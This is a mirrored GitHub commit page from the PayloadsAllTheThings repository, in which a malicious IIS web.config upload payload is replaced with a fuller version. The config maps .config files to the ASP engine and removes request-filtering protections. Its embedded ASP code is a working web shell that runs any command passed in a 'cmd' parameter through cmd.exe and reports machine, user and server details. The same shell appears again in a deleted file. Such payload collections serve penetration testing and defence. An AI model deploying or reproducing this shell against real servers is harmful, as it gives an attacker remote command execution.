mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-12 09:52:03 +00:00
Merge pull request #412 from A1vinSmith/master
Replace the web.config with the far better version web.web.config
This commit is contained in:
Swissky
GitHub
commit
19c7d1c9e8
@ -1,4 +1,4 @@
|
|||||||
<?xml version="1.0″ encoding="UTF-8″?>
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
<configuration>
|
<configuration>
|
||||||
<system.webServer>
|
<system.webServer>
|
||||||
<handlers accessPolicy="Read, Script, Write">
|
<handlers accessPolicy="Read, Script, Write">
|
||||||
@ -15,20 +15,51 @@
|
|||||||
</requestFiltering>
|
</requestFiltering>
|
||||||
</security>
|
</security>
|
||||||
</system.webServer>
|
</system.webServer>
|
||||||
<appSettings>
|
|
||||||
</appSettings>
|
|
||||||
</configuration>
|
</configuration>
|
||||||
<!–
|
<!--
|
||||||
<% Response.write("-"&"->")
|
<% Response.write("-"&"->")%>
|
||||||
Response.write("</p>
|
<%
|
||||||
<pre>")</p>
|
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
||||||
<p>Set wShell1 = CreateObject("WScript.Shell")
|
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||||
Set cmd1 = wShell1.Exec("whoami")
|
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||||
output1 = cmd1.StdOut.Readall()
|
|
||||||
set cmd1 = nothing: Set wShell1 = nothing</p>
|
|
||||||
<p>Response.write(output1)
|
|
||||||
Response.write("</pre>
|
|
||||||
<p><!-"&"-") %>
|
|
||||||
–>
|
|
||||||
|
|
||||||
<!-- web.config payload from https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -->
|
Function getCommandOutput(theCommand)
|
||||||
|
Dim objShell, objCmdExec
|
||||||
|
Set objShell = CreateObject("WScript.Shell")
|
||||||
|
Set objCmdExec = objshell.exec(thecommand)
|
||||||
|
|
||||||
|
getCommandOutput = objCmdExec.StdOut.ReadAll
|
||||||
|
end Function
|
||||||
|
%>
|
||||||
|
|
||||||
|
<BODY>
|
||||||
|
<FORM action="" method="GET">
|
||||||
|
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
|
||||||
|
<input type="submit" value="Run">
|
||||||
|
</FORM>
|
||||||
|
|
||||||
|
<PRE>
|
||||||
|
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
||||||
|
<%Response.Write(Request.ServerVariables("server_name"))%>
|
||||||
|
<p>
|
||||||
|
<b>The server's port:</b>
|
||||||
|
<%Response.Write(Request.ServerVariables("server_port"))%>
|
||||||
|
</p>
|
||||||
|
<p>
|
||||||
|
<b>The server's software:</b>
|
||||||
|
<%Response.Write(Request.ServerVariables("server_software"))%>
|
||||||
|
</p>
|
||||||
|
<p>
|
||||||
|
<b>The server's software:</b>
|
||||||
|
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
||||||
|
<% szCMD = request("cmd")
|
||||||
|
thisDir = getCommandOutput("cmd /c" & szCMD)
|
||||||
|
Response.Write(thisDir)%>
|
||||||
|
</p>
|
||||||
|
<br>
|
||||||
|
</BODY>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<%Response.write("<!-"&"-") %>
|
||||||
|
-->
|
||||||
|
|||||||
@ -1,65 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="UTF-8"?>
|
|
||||||
<configuration>
|
|
||||||
<system.webServer>
|
|
||||||
<handlers accessPolicy="Read, Script, Write">
|
|
||||||
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
|
||||||
</handlers>
|
|
||||||
<security>
|
|
||||||
<requestFiltering>
|
|
||||||
<fileExtensions>
|
|
||||||
<remove fileExtension=".config" />
|
|
||||||
</fileExtensions>
|
|
||||||
<hiddenSegments>
|
|
||||||
<remove segment="web.config" />
|
|
||||||
</hiddenSegments>
|
|
||||||
</requestFiltering>
|
|
||||||
</security>
|
|
||||||
</system.webServer>
|
|
||||||
</configuration>
|
|
||||||
<!--
|
|
||||||
<% Response.write("-"&"->")%>
|
|
||||||
<%
|
|
||||||
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
|
||||||
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
|
||||||
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
|
||||||
|
|
||||||
Function getCommandOutput(theCommand)
|
|
||||||
Dim objShell, objCmdExec
|
|
||||||
Set objShell = CreateObject("WScript.Shell")
|
|
||||||
Set objCmdExec = objshell.exec(thecommand)
|
|
||||||
|
|
||||||
getCommandOutput = objCmdExec.StdOut.ReadAll
|
|
||||||
end Function
|
|
||||||
%>
|
|
||||||
|
|
||||||
<BODY>
|
|
||||||
<FORM action="" method="GET">
|
|
||||||
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
|
|
||||||
<input type="submit" value="Run">
|
|
||||||
</FORM>
|
|
||||||
|
|
||||||
<PRE>
|
|
||||||
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
|
||||||
<%Response.Write(Request.ServerVariables("server_name"))%>
|
|
||||||
<p>
|
|
||||||
<b>The server's port:</b>
|
|
||||||
<%Response.Write(Request.ServerVariables("server_port"))%>
|
|
||||||
</p>
|
|
||||||
<p>
|
|
||||||
<b>The server's software:</b>
|
|
||||||
<%Response.Write(Request.ServerVariables("server_software"))%>
|
|
||||||
</p>
|
|
||||||
<p>
|
|
||||||
<b>The server's software:</b>
|
|
||||||
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
|
||||||
<% szCMD = request("cmd")
|
|
||||||
thisDir = getCommandOutput("cmd /c" & szCMD)
|
|
||||||
Response.Write(thisDir)%>
|
|
||||||
</p>
|
|
||||||
<br>
|
|
||||||
</BODY>
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<%Response.write("<!-"&"-") %>
|
|
||||||
-->
|
|
||||||
Loading…
Reference in New Issue
Block a user